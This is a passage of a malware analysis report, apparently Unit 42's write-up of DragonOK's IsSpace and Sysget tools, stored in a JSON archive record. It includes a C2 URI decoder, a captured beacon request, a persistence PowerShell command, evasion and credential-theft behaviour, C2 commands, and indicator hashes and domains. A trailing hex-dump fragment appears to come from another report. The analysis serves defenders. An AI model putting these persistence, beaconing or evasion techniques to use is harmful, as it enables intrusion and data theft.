The following Python script may be used to de-obfuscate the base64 URI found in this variant:\r\nimport base64\r\n\r\n'''\r\nURI Request:\r\nGET /5.php?62H72xihwn4LqfdOqTV4W2AthjuOeCa2k0RUvE7CicXxN2MWFre2pqH8gIdMMJQbzS0AMo+rT4GGalhcebmCbjdrjZlyDhmUjE7QO5mIXZTAucGt3LeLXxOxGiV1G4zecHSPAX3AiAeR+BGFsc3wtMhOWzXfithXYeCKnjh1O7pXsYqyKqfl=HpVzs4YXZb=UQY=BNEnr/77jW5JTLNI4aed99 HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36\r\nHost: www.sanseitime[.]com\r\n'''\r\n\r\nuri_string = (\r\n  \"62H72xihwn4LqfdOqTV4W2AthjuOeCa2k0RUvE7CicXxN2MWFre2pqH8gIdMMJQbzS0AMo+rT\"\r\n  \"4GGalhcebmCbjdrjZlyDhmUjE7QO5mIXZTAucGt3LeLXxOxGiV1G4zecHSPAX3AiAeR+BGFsc3\"\r\n  \"wtMhOWzXfithXYeCKnjh1O7pXsYqyKqfl=HpVzs4YXZb=UQY=BNEnr/77jW5JTLNI4aed99\"\r\n)\r\n# 65-symbol alphabet: the padding character takes part in the shift as well.\r\nb64_string = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\"\r\n\r\n# The first two characters are a decimal shift; every following character is\r\n# rotated back through the alphabet by that amount (a negative index wraps).\r\nprefix_int = int(uri_string[0:2])\r\nout = \"\"\r\nfor u in uri_string[2:]:\r\n  ind = b64_string.index(u) - prefix_int\r\n  out += b64_string[ind]\r\ndecoded = base64.b64decode(out)\r\nAdditionally, the C2 URI changes in this variant, from 1.php to 5.php.\r\nIsSpace Analysis\r\nWhen initially run, IsSpace will create a unique event to ensure a single instance of the malware is running at a given time. This event name appears to be unique per sample, as multiple samples contained unique event names. 
The following event names have been observed in the samples that were analyzed:\r\ne6al69MS5iP\r\nv485ILa3q5z\r\nIsSpace proceeds to iterate over the running processes on the system, seeking out the following two process substrings:\r\nuiSeAgnt\r\navp.exe\r\nThe uiSeAgnt string may be related to Trend Micro’s solutions, while avp.exe most likely is related to Kaspersky’s anti-malware product.\r\nIn the event uiSeAgnt is identified, the malware will enter its installation routine if not already running as ‘bfsuc.exe’ and proceeds to exit afterwards. Should avp.exe be identified, the malware enters an infinite sleep loop until a mouse click occurs (a common check for a real, interactive user as opposed to a sandbox). After this takes place, the malware proceeds as normal.\r\nThe malware then determines if it is running under Windows XP. In the event that it is, it will make an HTTP GET request to www.bing.com, presumably to ensure network connectivity.\r\nFigure 9 IsSpace connecting to www.bing.com\r\nIf the malware is not running on Windows XP, it will attempt to obtain and decrypt any basic authentication credentials from Internet Explorer. This information is used in subsequent HTTP requests in the event a 407 (Proxy Authentication Required) or 401 (Unauthorized) response code is received during network communication.\r\nIsSpace will then enter its installation routine, where it will first copy itself to the %LOCALAPPDATA% folder with a name of ‘bfsuc.exe’. It then sets the registry key for persistence by executing the following PowerShell command via cmd.exe; the Run value is named ‘Identity’, and the path below reflects the analysis machine:\r\nC:\\Windows\\system32\\cmd.exe /C Powershell.exe New-ItemProperty -Path HKCU:SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run -Name Identity -PropertyType String -Value c:\\users\\josh grunzweig\\appdata\\local\\bfsuc.exe -force\r\nThe malware then makes an initial HTTP POST request to the configured C2 server. 
It will make this request to the ‘/news/Senmsip.asp’ URI. The POST data is XORed against a key of “\\x35\\x8E\\x9D\\x7A”, which is consistent with previous versions of IsSpace and NFlog. Decrypted, the POST data reads “01234567890”. The C2 server in turn will respond with the victim’s external IP address.\r\nFigure 10 Initial IsSpace beacon\r\nIsSpace then spawns two threads that will make HTTP requests to the following URIs:\r\n/news/Sennw.asp?rsv_info=[MAC_ADDRESS]\r\n/news/Sentire.asp?rsv_info=[MAC_ADDRESS]\r\nThe ‘Sennw.asp’ POST requests contain collected victim information. They, like other information sent across the network, are encrypted using the previously mentioned 4-byte XOR key. When decrypted, we are provided with information such as the following:\r\n60-F8-1D-CC-2F-CF#%#172.16.95.1#%#172.16.95.186#%#WIN-LJLV2NKIOKP#%#Win7#%#English(US)#%#2016-12-20 16:27:12#%#Active#%#xp20160628#%#IsAdmins#%#False\r\nThe information, delimited via ‘#%#’, is as follows:\r\nValue                 Description\r\n60-F8-1D-CC-2F-CF     MAC address\r\n172.16.95.1           External IP collected previously\r\n172.16.95.186         Internal IP address\r\nWIN-LJLV2NKIOKP       Hostname\r\nWin7                  Windows version\r\nEnglish(US)           Language\r\n2016-12-20 16:27:12   Timestamp\r\nActive                Malware status. May also be ‘Sleep’\r\nxp20160628            Potential campaign identifier\r\nIsAdmins / False      User admin status\r\nThe C2 server is expected to return one of the following two responses to this HTTP request:\r\nActive\r\nSlient (note the typo)\r\nIn the event the response of Slient is received, the malware will stop sending HTTP requests to the ‘Sentire.asp’ URI. 
Conversely, if the malware is in the ‘Sleep’ status and the ‘Active’ response is received, it\r\nresumes the ‘Sentire.asp’ requests.\r\nThe requests to ‘Sentire.asp’ form the main C2 loop, requesting commands from the remote server. The\r\ncommands are consistent with previously observed instances of IsSpace; only the URIs have been modified.\r\nCommand | Description | Response URI\r\nCMD | Executes command | Sentrl.asp\r\nBrowse | List specified directory | Senjb.asp\r\nUploadFile | Upload file | Sensp.asp\r\nDownLoad | Download file | Senwhr.asp\r\nDelFile | Delete file | N/A\r\nDragonOK Indicators\r\nMalicious RTF Documents\r\n020f5692b9989080b328833260e31df7aa4d58c138384262b9d7fb6d221e3673\r\n0d389a7b7dbdfdffcc9b503d0eaf3699f94d7a3135e46c65a4fa0f79ea263b40\r\n52985c6369571793bc547fc9443a96166e372d0960267df298221cd841b69545\r\n785398fedd12935e0ae5ac9c1d188f4868b2dc19fb4c2a13dab0887b8b3e220d\r\n941bcf18f7e841ea35778c971fc968317bee09f93ed314ce40815356a303a3ec\r\nba6f3581c5bcdbe7f23de2d8034aaf2f6dc0e67ff2cfe6e53cfb4d2007547b30\r\ndf9f33892e476458c74a571a9541aebe8f8d18b16278f594a6723f813a147552\r\n925880cc833228999ea06bd37dd2073784ab234ea00c5c4d55f130fe43a0940b\r\n3e4937d06ac86078f96f07117861c734a5fdb5ea307fe7e19ef6458f91c14264\r\n16204cec5731f64be03ea766b75b8997aad14d4eb61b7248aa35fa6b1873398b\r\n64f22de7a1e2726a2c649de133fad2c6ad089236db1006ce3d247c39ee40f578\r\nc3b5503a0a89fd2eae9a77ff92eef69f08d68b963140b0a31721bb4960545e07\r\nd227cf53b29bf0a286e9c4a1e84a7d70b63a3c0ea81a6483fdfabd8fbccd5206\r\n9190b1d3383c68bd0153c926e0ff3716b714eac81f6d125254054b277e3451fe\r\nd321c8005be96a13affeb997b881eaba3e70167a7f0aa5d68eeb4d84520cca02\r\nd38de4250761cb877dfec40344c1642542ca41331af50fa914a9597f8cc0ee9b\r\n5a94e5736ead7ea46dbc95f11a3ca10ae86c8ae381d813975d71feddf14fc07a\r\nbbdc9f02e7844817def006b9bdef1698412efb6e66346454307681134046e595\r\nIsSpace\r\n12d88fbd4960b7caf8d1a4b96868138e67db40d8642a4c21c0279066aae2f429\r\n1a6e3cd2394814a72cdf8db55bc3f781f7e1335b31f77bffc1336f0d11cf23d1\r\nC2 Domains\r\nwww.dppline[.]org\r\nwww.matrens[.]top\r\nC2 Domains\r\neurope.wikaba[.]com\r\nrussiaboy.ssl443[.]org\r\ncool.skywave[.]top\r\nSysget Version 2\r\n82f028e147471e6f8c8d283dbfaba3f5629eda458d818e1a4ddb8c9337fc0118\r\nC2 Domains\r\nnewtw2016.kr44.78host[.]com\r\nSysget Version 3\r\n02fc713c1b2c607dff4fc6c4797b39e42ee576578f6af97295495b9b172158b9\r\na0b0a49da119d971fa3cf2f5647ccc9fe7e1ff989ac31dfb4543f0cb269ed105\r\nb49cb2c51bc2cc5e48585b9b0f7dd7ff2599a086a4219708b102890ab3f4daf3\r\nb8f9c1766ccd4557383b6643b060c15545e5f657d87d82310ed1989679dcfac4\r\nd75433833a3a4453fe35aaf57d8699d90d9c4a933a8457f8cc37c86859f62d1e\r\n685076708ace9fda65845e4cbb673fdd6f11488bf0f6fd5216a18d9eaaea1bbc\r\n7fcc86ebca81deab264418f7ae5017a6f79967ccebe8bc866efa14920e4fd909\r\nc5c3e8caffd1d416c1fd8947e60662d82638a3508dbcf95a6c9a2571263bdcef\r\nC2 Domains\r\ngtoimage[.]com\r\ntrend.gogolekr[.]com\r\nAdditional Indicators\r\nSysget Version 
2\r\na768d63f8127a8f87ff7fa8a7e4ca1f7e7a88649fe268cf1bd306be9d8069564\r\n2bf737f147e761586df1c421584dba350fd865cb14113eee084f9d673a61ee67\r\n2c7c9fd09a0a783badfb42a491ccec159207ee7f65444088ba8e7c8e617ab5a5\r\nd91439c8faa0c42162ea9a6d3c282d0e76641a31f5f2fbc58315df9c0b90059c\r\n89d8d52c09dc09aeb41b1e9fafeacf1c038912d8c6b75ad4ef556707b15641ff\r\n6c1d56cb16f6342e01f4ebfc063db2244aef16d0a248332348dcdb31244d32f2\r\n9c66232061fbb08088a3b680b4d0bffbbce1ce01d0ce5f0c4d8bf17f42d45682\r\nb138ea2e9b78568ebd9d71c1eb0e31f9cf8bc41cd5919f6522ef498ffcc8762a\r\n8830400c6a6d956309ac9bcbcceee2d27ba8c89f9d89f4484aba7d5680791459\r\nbda66f13202cef8cfb23f36ac0aee5c23f82930e1f38e81ba807f5c4e46128e3\r\ne8197e711018afd25a32dc364a9155c7e2a0c98b3924dc5f67b8cd2df16406ff\r\ne9c0838e2433a86bc2dec56378bd59627d6332ffb1aec252f5117938d00d9f74\r\nc63685b2497e384885e4b4649428d665692e8e6981dad688e8543110174f853b\r\n2c9c2bfea64dd95495703fcec59ad4cf74c43056b40ed96d40db9b919cfd050b\r\n94850525ea9467ae772c657c3b8c72663eaa28b2c995b22a12b09e4cacecad6d\r\ne8bd20e3d8491497ca2d6878b41fb7be67abb97ee272ef8b6735faa6acd67777\r\nC2 Domains\r\nhello.newtaiwan[.]top\r\nbullskingdom[.]com\r\nmail.googleusa[.]top\r\nwww.modelinfos[.]com\r\nmodelinfos[.]com\r\nwww.sanspozone[.]com\r\nSysget Version 3\r\nf9a1607cdcfd83555d2b3f4f539d3dc301d307e462a999484d7adb1f1eb9edf6\r\n7f286fbc39746aa8feeefc88006bedd83a3176d2235e381354c3ea24fe33d21c\r\n3b554ef43d9f3e70ead605ed38b5e66c0b8c0b9fc8df16997defa8e52824a2a6\r\n8d7406f4d5759574416b8e443dd9d9cd6e24b5e39b1f5bc679e4a1ad54d409c6\r\nedf32cb7aad7ae6f545f7d9f11e14a8899ab0ac51b224ed36cfc0d367daf5785\r\ndb19b9062063302d938bae51fe332f49134dc2e1947d980c82e778e9d7ca0616\r\ncde217acb6cfe20948b37b16769164c5f384452e802759eaabcfa1946ea9e18b\r\n9bee4f8674ee067159675f66ca8d940282b55fd1f71b8bc2aa32795fd55cd17e\r\n39539eb972de4e5fe525b3226f679c94476dfc88b2032c70e5d7b66058619075\r\nc45145ca9af7f21fff95c52726ff82595c9845b8e9d0dbf93ffe98b7a6fa8ee9\r\n55325e9fccbdada83279e915e5aeb60d7b117f154fa2c3a38ec686d2552b1ebc\r\n2c7d29da1b5468b49a4aef31eee6757dc5c3627bf2fbfb8e01dec12aed34736a\r\n16dc75cf16d582eac6cbbe67b048a31fffa2fb525a76c5794dad7d751793c410\r\n91eee738f99174461b9a4085ea70ddafc0997790e7e5d6d07704dcbbc72dc8bf\r\n4a702ffbf01913cc3981d9802c075160dfd1beed3ba0681153d17623f781f53f\r\ne8bed52c58759e715d2a00bdb8a69e7e93def8d4f83d95986da21a549f4d51c5\r\ned5598716de2129915f427065f0a22f425f4087584e1fa176c6de6ad141889d1\r\nadc86af1c03081482fe9ba9d8a8ae875d7217433164d54e40603e422451a2b90\r\nf0540148768247ed001f3894cdfa52d8e40b17d38df0f97e040a49baa3f5c92e\r\nce38a6e4f15b9986474c5d7c8a6e8b0826330f0135e1da087aae9eab60ea667a\r\n5c4e98922e6981cf2a801674d7e79a573ebcdc9ebc875ef929511f585b9c4781\r\n4880b43ddc8466d910b7b49b6779970c38ce095983cad110fa924b41f249f898\r\n76b6f0359a3380943fece13033b79dc586706b8348a270ac71b589a5fd5790a4\r\nfeab16570c11ec713cfa952457502c7edd21643129c846609cb13cdc0ae4671c\r\ned9ca7c06aac7525da5af3d1806b32eeb1c1d8f14cc31382ca52a14ed62f00a9\r\na3aa4b3b3471b0bb5b2f61cbc8a94edef4988436e0bc55e9503173c836fb57a3\r\n29ee56ca66187ece41c1525ad27969a4b850a45815057a31acee7cc76e970909\r\n65201380443210518621da9feb45756eac31213a21a81583cc158f8f65d50626\r\ncccb906d06aef1e33d12b8b09c233e575482228d40ac17232acad2557da4e53b\r\nC2 Domains\r\ngtoimage[.]com\r\ntrend.gogolekr[.]com\r\nwww.bestfiles[.]top\r\nSysget Version 
4\r\n2ac8bc678e5fa3e87d34aee06d2cd56ab8e0ed04cd236cc9d4c5e0fa6d303fa3\r\n8dc539e3d37ccd522c594dc7378c32e5b9deeffb37e7a7a5e9a96b9a23df398e\r\nC2 Domains\r\nwww.sanseitime[.]com\r\nSource: https://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nFrom page 17: The contents of this POST request are shown below. The first 50 bytes are reserved for the victim’s identifier, followed by the file’s contents encrypted with the unique key.\r\n0000016F 35 37 31 37 63 62 38 66 65 64 32 37 35 30 61 32 5717cb8f ed2750a2\r\n0000017F 65 65 39 65 38 33 30 61 33 30 37 31 36 65 64 34 ee9e830a 30716ed4\r\n0000018F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/"
	],
	"report_names": [
		"unit42-dragonok-updates-toolset-targets-multiple-geographic-regions"
	],
	"threat_actors": [
		{
			"id": "5ffe400c-6025-44c2-9aa1-7c34a7a192b0",
			"created_at": "2023-01-06T13:46:38.469688Z",
			"updated_at": "2026-04-10T02:00:02.987949Z",
			"deleted_at": null,
			"main_name": "DragonOK",
			"aliases": [
				"Moafee",
				"BRONZE OVERBROOK",
				"G0017",
				"G0002",
				"Shallow Taurus"
			],
			"source_name": "MISPGALAXY:DragonOK",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7ebda3c6-1789-4d84-97cf-47fb18a0cb28",
			"created_at": "2022-10-25T15:50:23.78829Z",
			"updated_at": "2026-04-10T02:00:05.415039Z",
			"deleted_at": null,
			"main_name": "DragonOK",
			"aliases": [
				"DragonOK"
			],
			"source_name": "MITRE:DragonOK",
			"tools": [
				"PoisonIvy",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "593dd07d-853c-46cd-8117-e24061034bbf",
			"created_at": "2025-08-07T02:03:24.648074Z",
			"updated_at": "2026-04-10T02:00:03.625859Z",
			"deleted_at": null,
			"main_name": "BRONZE OVERBROOK",
			"aliases": [
				"Danti ",
				"DragonOK ",
				"Samurai Panda ",
				"Shallow Taurus ",
				"Temp.DragonOK "
			],
			"source_name": "Secureworks:BRONZE OVERBROOK",
			"tools": [
				"Aveo",
				"DDKONG",
				"Godzilla Webshell",
				"HelloBridge",
				"IsSpace",
				"NFLog Trojan",
				"PLAINTEE",
				"PlugX",
				"Rambo"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "340d1673-0678-4e1f-8b75-30da2f65cc80",
			"created_at": "2022-10-25T16:07:23.552036Z",
			"updated_at": "2026-04-10T02:00:04.653109Z",
			"deleted_at": null,
			"main_name": "DragonOK",
			"aliases": [
				"Bronze Overbrook",
				"G0017",
				"Shallow Taurus"
			],
			"source_name": "ETDA:DragonOK",
			"tools": [
				"Agent.dhwf",
				"CT",
				"Chymine",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"FF-RAT",
				"FormerFirstRAT",
				"Gen:Trojan.Heur.PT",
				"HTran",
				"HUC Packet Transmit Tool",
				"HelloBridge",
				"IsSpace",
				"KHRAT",
				"Kaba",
				"Korplug",
				"Mongall",
				"NFlog",
				"NewCT",
				"NfLog RAT",
				"PlugX",
				"Poison Ivy",
				"Rambo",
				"RedDelta",
				"SPIVY",
				"Sogu",
				"SysGet",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"TidePool",
				"Xamtrav",
				"brebsd",
				"ffrat",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434340,
	"ts_updated_at": 1775792057,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f4c1371ead52fc9c24313563bf94349006cb165d.pdf",
		"text": "https://archive.orkl.eu/f4c1371ead52fc9c24313563bf94349006cb165d.txt",
		"img": "https://archive.orkl.eu/f4c1371ead52fc9c24313563bf94349006cb165d.jpg"
	}
}